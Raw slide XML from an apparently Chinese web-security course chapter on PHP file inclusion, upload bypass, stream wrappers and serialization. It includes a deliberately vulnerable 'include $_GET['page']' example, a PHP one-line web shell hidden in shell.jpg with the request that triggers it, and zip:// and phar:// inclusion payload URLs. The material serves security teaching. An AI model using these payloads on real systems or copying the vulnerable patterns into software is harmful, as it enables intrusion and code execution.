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1"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId3"/>
    <p:sldId id="9234" r:id="rId5"/>
    <p:sldId id="9217" r:id="rId6"/>
    <p:sldId id="9231" r:id="rId7"/>
    <p:sldId id="9229" r:id="rId8"/>
    <p:sldId id="9331" r:id="rId9"/>
    <p:sldId id="9332" r:id="rId10"/>
    <p:sldId id="9333" r:id="rId11"/>
    <p:sldId id="9236" r:id="rId12"/>
    <p:sldId id="9306" r:id="rId13"/>
    <p:sldId id="9233" r:id="rId14"/>
    <p:sldId id="9353" r:id="rId15"/>
    <p:sldId id="9354" r:id="rId16"/>
    <p:sldId id="9355" r:id="rId17"/>
    <p:sldId id="9305" r:id="rId18"/>
    <p:sldId id="9218" r:id="rId19"/>
    <p:sldId id="9334" r:id="rId20"/>
    <p:sldId id="9314" r:id="rId21"/>
    <p:sldId id="9335" r:id="rId22"/>
    <p:sldId id="9336" r:id="rId23"/>
    <p:sldId id="9315" r:id="rId24"/>
    <p:sldId id="9337" r:id="rId25"/>
    <p:sldId id="9232" r:id="rId26"/>
    <p:sldId id="9338" r:id="rId27"/>
    <p:sldId id="9339" r:id="rId28"/>
    <p:sldId id="9316" r:id="rId29"/>
    <p:sldId id="9340" r:id="rId30"/>
    <p:sldId id="9341" r:id="rId31"/>
    <p:sldId id="9346" r:id="rId32"/>
    <p:sldId id="9347" r:id="rId33"/>
    <p:sldId id="9351" r:id="rId34"/>
    <p:sldId id="9352" r:id="rId35"/>
    <p:sldId id="9344" r:id="rId36"/>
    <p:sldId id="9342" r:id="rId37"/>
    <p:sldId id="9343" r:id="rId38"/>
    <p:sldId id="9345" r:id="rId39"/>
    <p:sldId id="9357" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId4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3"/>
        <p:guide pos="4095"/>
        <p:guide pos="557"/>
        <p:guide orient="horz" pos="4183"/>
        <p:guide pos="7474"/>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第十二章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100783" y="816086"/>
            <a:ext cx="10297144" cy="4239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mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php-apache2handler.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开启。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5876967"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128"/>
              </a:tblGrid>
              <a:tr h="5328592">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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文件名</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类型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大小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临时存放路径</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900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>if((</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>$type=="image/jpeg")&amp;&amp;($size&lt;100000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>      </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endPar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}else{</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"error file type.";</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5421263" y="231949"/>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421264" y="519981"/>
            <a:ext cx="2016224" cy="474140"/>
            <a:chOff x="5747023" y="837929"/>
            <a:chExt cx="1364703" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="íślíḋè-Straight Connector 13"/>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1100783" y="1384078"/>
            <a:ext cx="10873208" cy="1512167"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861378" y="3533003"/>
              <a:ext cx="7144552" cy="2561438"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pP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a.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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include $_GET['page']; //The page we wish to display   </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 </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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="3017805"/>
            <a:ext cx="11233248" cy="1477328"/>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第一步：使用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upload.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"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shell.jpg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($_GET['pass']);?&gt;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第二步：访问</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http://127.0.0.1/a.php?page=up/shell.jpg&amp;pass=phpinfo();</a:t>
            </a:r>
            <a:endPar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324919" y="4528085"/>
            <a:ext cx="9072711" cy="2350332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形标注 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9381704" y="2034319"/>
            <a:ext cx="2808312" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88440"/>
              <a:gd name="adj2" fmla="val 7002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不是简单的改后缀就行，咋办？</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5627198"/>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带有很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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内置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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风格的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" u="sng"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封装协议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，可用于类似</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fopen</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copy()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file_exists</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filesize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的文件系统函数，</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可在</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命令中使用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。除了这些封装协议，还能注册自定义的封装协议。常见的协议有：</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file://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访问本地文件系统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网址</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ftp://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FTP(s) URLs</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php://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访问各个输入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 streams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zlib://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压缩流</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phar:// — PHP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归档</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64499"/>
            <a:ext cx="4032448" cy="519578"/>
            <a:chOff x="596727" y="864499"/>
            <a:chExt cx="2596493" cy="519578"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>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48299" y="1392013"/>
                <a:ext cx="19683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伪协议</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security-shield_74740"/>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028775" y="736005"/>
            <a:ext cx="10729192" cy="3964305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1. php://filter </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>	php://filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>元封装器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，设计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用于数据流打开时的筛选过滤应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>php://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>可以读取本地文件的内容，还可以对读取的内容进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>编码处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>等函数包含的文件会被当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>文件一样进行处理，如果被包含的文件中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>代码，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>代码将会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>文件中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>代码以外的内容，会直接返回给客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>。利用这个特性，攻击者可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>页面的源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>。为后续的渗透工作提供帮助。下面的例子中，攻击者对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>内容进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" u="sng" dirty="0"/>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，将获取到的字符串在本地进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>解码后就能得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>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735" y="4912469"/>
            <a:ext cx="11528873"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596727" y="736005"/>
            <a:ext cx="11161240" cy="2672543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2. phar://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>zip://</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>	phar://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>zip://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>获取压缩文件内的内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>hack.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的压缩包中，有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的文件，则可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>phar://hack.zip/shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的方式访问压缩包内的文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>zip://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>也是类似。这两个协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>不受文件后缀名的影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>hack.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>改名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>hack.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>后，依然可以通过这种方式访问压缩包内的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028775" y="3820319"/>
          <a:ext cx="10441159" cy="2133600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10441159"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>常用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>payload*/</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http://www.xxx.com/index.php?func=zip://hack.jpg%23shell.php</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/*zip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>协议的用法为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>zip://hack.jpg#shell.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，由于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>协议中有特殊的含义，所以在发送请求时要对其进行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>编码</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>*/</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http://www.xxx.com/index.php?func=phar://hack.jpg/shell.php</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828975" y="2929344"/>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1928801" y="1402731"/>
              <a:ext cx="351420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序列化与反序列化</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3409950"/>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序列化是指将对象、数组等数据结构转化为</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可以储存的格式</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的过程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。程序在运行时，变量的值都是储存在内存中的，程序运行结束，操作系统就会将内存空间收回，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要想要将内存中的变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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写入磁盘中或是通过网络传输</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，就需要对其进行序列化操作，</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序列化能将一个对象转换成一个字符串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中，序列化后的字符串保存了对象所有的变量，但是不会保存对象的方法，只会保存类的名字。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等编程语言都有各自的序列化的机制。</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6768" y="4984477"/>
            <a:ext cx="5385214" cy="1656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会创建一个</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example</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类的对象，并将其序列化后保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="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serialize.txt</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中并打印到屏幕上。</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1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5328592"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128"/>
              </a:tblGrid>
              <a:tr h="5328592">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new example();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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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serialize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file_put_contents</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 $serialized);</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$serialized;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2" y="1240061"/>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上述代码运行的结果为：</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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820863" y="4048373"/>
            <a:ext cx="9000999" cy="208823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代表储存的是对象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(object)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代表对象中变量个数，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表示字符串，</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，代表长度，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 message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类名及变量名</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2180903" y="2525604"/>
            <a:ext cx="9407946" cy="461665"/>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O:7:"example":1:{s:16:" example message";s:11:"hello world";}</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bldLvl="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将序列化后的字符串恢复为数据结构的过程就叫做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反序列化</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u="sng" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>为了能够反序列化一个对象，这个对象的类在执行反序列化的操作前必须已经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="sng" kern="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定义过</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1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5040560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128"/>
              </a:tblGrid>
